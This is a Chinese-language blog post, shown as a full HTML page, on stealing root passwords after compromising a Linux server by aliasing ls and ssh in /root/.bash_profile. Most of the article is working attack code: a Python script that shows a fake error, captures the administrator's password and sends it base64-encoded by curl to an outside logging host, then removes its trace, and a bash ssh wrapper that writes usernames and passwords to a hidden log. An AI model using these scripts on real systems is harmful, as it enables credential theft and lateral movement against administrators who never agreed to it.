<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="当通过web途径获取到linux机器时，往往想获取到root明文密码进行横向扩展，但是拿到shadow又无法解密，此时可以通过设置别名进行窃取管理员密码。 劫持系统ls命令：首先设置变量别名到环境变量下并赋值文件权限 12echo &amp;quot;alias ls=/var/tmp/update.py&amp;quot;&amp;gt;&amp;gt; /root/.bash_profile chmod u+x /var/t">
<meta property="og:type" content="article">
<meta property="og:title" content="探索基于linux别名特性窃取密码">
<meta property="og:url" content="http://yoursite.com/2020/02/12/----3/index.html">
<meta property="og:site_name" content="c1y2m3’blog">
<meta property="og:description" content="当通过web途径获取到linux机器时，往往想获取到root明文密码进行横向扩展，但是拿到shadow又无法解密，此时可以通过设置别名进行窃取管理员密码。 劫持系统ls命令：首先设置变量别名到环境变量下并赋值文件权限 12echo &amp;quot;alias ls=/var/tmp/update.py&amp;quot;&amp;gt;&amp;gt; /root/.bash_profile chmod u+x /var/t">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5e44bdec28011f685eb60942">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5e44be5432f2ca5a1c6f190b">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5e44c01790144e59595037cb">
<meta property="og:updated_time" content="2020-02-13T03:35:58.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="探索基于linux别名特性窃取密码">
<meta name="twitter:description" content="当通过web途径获取到linux机器时，往往想获取到root明文密码进行横向扩展，但是拿到shadow又无法解密，此时可以通过设置别名进行窃取管理员密码。 劫持系统ls命令：首先设置变量别名到环境变量下并赋值文件权限 12echo &amp;quot;alias ls=/var/tmp/update.py&amp;quot;&amp;gt;&amp;gt; /root/.bash_profile chmod u+x /var/t">
<meta name="twitter:image" content="https://www.yunzhijia.com/microblog/filesvr/5e44bdec28011f685eb60942">
    
    
        
          
              <link rel="shortcut icon" href="/c1y2m3.github.io/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/c1y2m3.github.io/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/c1y2m3.github.io/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>探索基于linux别名特性窃取密码</title>
    <!-- styles -->
    <link rel="stylesheet" href="/c1y2m3.github.io/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/c1y2m3.github.io/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/c1y2m3.github.io/2019/11/21/httpsys/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/02/12/----3/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/02/12/----3/&text=探索基于linux别名特性窃取密码"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/02/12/----3/&is_video=false&description=探索基于linux别名特性窃取密码"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=探索基于linux别名特性窃取密码&body=Check out this article: http://yoursite.com/2020/02/12/----3/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/02/12/----3/&name=探索基于linux别名特性窃取密码&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#劫持系统ls命令："><span class="toc-number">1.</span> <span class="toc-text">劫持系统ls命令：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#劫持系统ssh命令："><span class="toc-number">2.</span> <span class="toc-text">劫持系统ssh命令：</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        探索基于linux别名特性窃取密码
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">c1y2m3’blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2020-02-12T02:50:00.000Z" itemprop="datePublished">2020-02-12</time>
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>当通过web途径获取到linux机器时，往往想获取到root明文密码进行横向扩展，但是拿到shadow又无法解密，此时可以通过设置别名进行窃取管理员密码。</p>
<h1 id="劫持系统ls命令："><a href="#劫持系统ls命令：" class="headerlink" title="劫持系统ls命令："></a>劫持系统ls命令：</h1><p>首先设置变量别名到环境变量下并赋值文件权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;alias ls=/var/tmp/update.py&quot;&gt;&gt; /root/.bash_profile </span><br><span class="line">chmod u+x /var/tmp/update.py</span><br></pre></td></tr></table></figure>
<p>此处务必注意,在修改目标的任何配置文件之前,先备份下,不然出问题就尴尬了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cp /root/.bash_profile /var/tmp/.bash_profile</span><br></pre></td></tr></table></figure>
<p>update.py具体代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">#! /usr/bin/env python2.7</span><br><span class="line"># -*- coding:UTF-8 -*-</span><br><span class="line"></span><br><span class="line">import getpass</span><br><span class="line">import os</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line">filex = &quot;/var/tmp/.pwds&quot;</span><br><span class="line"></span><br><span class="line">def password():</span><br><span class="line"></span><br><span class="line">    if os.path.exists(filex):</span><br><span class="line">        os.system(&apos;ls&apos;)</span><br><span class="line">    else:</span><br><span class="line">        print((&quot;An unknown error occured and confirm your password:&quot;))</span><br><span class="line">        pwd = getpass.getpass(&quot;Password:&quot;)</span><br><span class="line">        if len(pwd) == 0:</span><br><span class="line">            pwd = getpass.getpass(&quot;Password:&quot;)</span><br><span class="line"></span><br><span class="line">        # with open(filex,&apos;w+&apos;) as f:</span><br><span class="line">        #     f.write(a)</span><br><span class="line">        url = &apos;http://shv707.ceye.io/&#123;&#125;&apos;.format(base64.b64encode(pwd))</span><br><span class="line">        os.popen(&apos;curl &#123;&#125; 2&gt;/dev/null&apos;.format(url))</span><br><span class="line">        os.popen(&quot;sed -i &apos;$d&apos; /root/.bash_profile&quot;)</span><br><span class="line">        os.mkdir(filex)</span><br><span class="line">        os.system(&apos;ls&apos;)</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    password()</span><br></pre></td></tr></table></figure>
<p>等待管理员连接服务器后并执行ls时，就会弹出报错，要求输入密码而后将输入进的内容进行base64编码，通过拼接回传到攻击者页面，执行正常的命令并将环境变量恢复原样。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5e44bdec28011f685eb60942" alt=""></p>
<h1 id="劫持系统ssh命令："><a href="#劫持系统ssh命令：" class="headerlink" title="劫持系统ssh命令："></a>劫持系统ssh命令：</h1><p>当管理员执行ssh user@rhost时，首先执行攻击者设置好的别名文件，负责将输入的内容进行回传或保存本地，由于ssh不能通过管道符进行传参，则使用sshpass传参给正常的ssh连接。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;alias ssh=/var/tmp/ssh&quot;&gt;&gt; /root/.bash_profile </span><br><span class="line">chmod u+x /var/tmp/ssh</span><br></pre></td></tr></table></figure>
<p>shell脚本具体代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/bash</span><br><span class="line"></span><br><span class="line">if [ $# != &quot;1&quot; ] </span><br><span class="line">then </span><br><span class="line">	/usr/bin/ssh </span><br><span class="line">else </span><br><span class="line">	echo -e &quot;$&#123;1&#125;&apos;s password: \c&quot; </span><br><span class="line">	read -s pass </span><br><span class="line">	echo $1&quot;:&quot;$pass &gt;&gt; /var/tmp/.log </span><br><span class="line">	echo &quot;&quot; </span><br><span class="line">	sshpass -p &quot;$pass&quot; /usr/bin/ssh $&#123;1&#125;</span><br><span class="line">fi</span><br></pre></td></tr></table></figure>
<p>sshpass是用于非交互的ssh 密码验证</p>
<p>从命令行方式传递密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sshpass -p user_password ssh user_name@rhost</span><br></pre></td></tr></table></figure>
<p>下载地址：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://sourceforge.net/projects/sshpass/files/latest/download</span><br></pre></td></tr></table></figure></p>
<p>下载后，解压，安装<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf sshpass-1.06.tar.gz</span><br><span class="line">./configure</span><br><span class="line">make install</span><br></pre></td></tr></table></figure></p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5e44be5432f2ca5a1c6f190b" alt=""></p>
<p>最后，到指定的目录下，即可看到窃取到的远程服务器账号以及密码，如下：</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5e44c01790144e59595037cb" alt=""></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#劫持系统ls命令："><span class="toc-number">1.</span> <span class="toc-text">劫持系统ls命令：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#劫持系统ssh命令："><span class="toc-number">2.</span> <span class="toc-text">劫持系统ssh命令：</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/02/12/----3/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/02/12/----3/&text=探索基于linux别名特性窃取密码"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/02/12/----3/&is_video=false&description=探索基于linux别名特性窃取密码"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=探索基于linux别名特性窃取密码&body=Check out this article: http://yoursite.com/2020/02/12/----3/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/02/12/----3/&title=探索基于linux别名特性窃取密码"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/02/12/----3/&name=探索基于linux别名特性窃取密码&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/c1y2m3.github.io/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/c1y2m3.github.io/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/c1y2m3.github.io/lib/jquery/jquery.min.js"></script>
<script src="/c1y2m3.github.io/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/c1y2m3.github.io/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


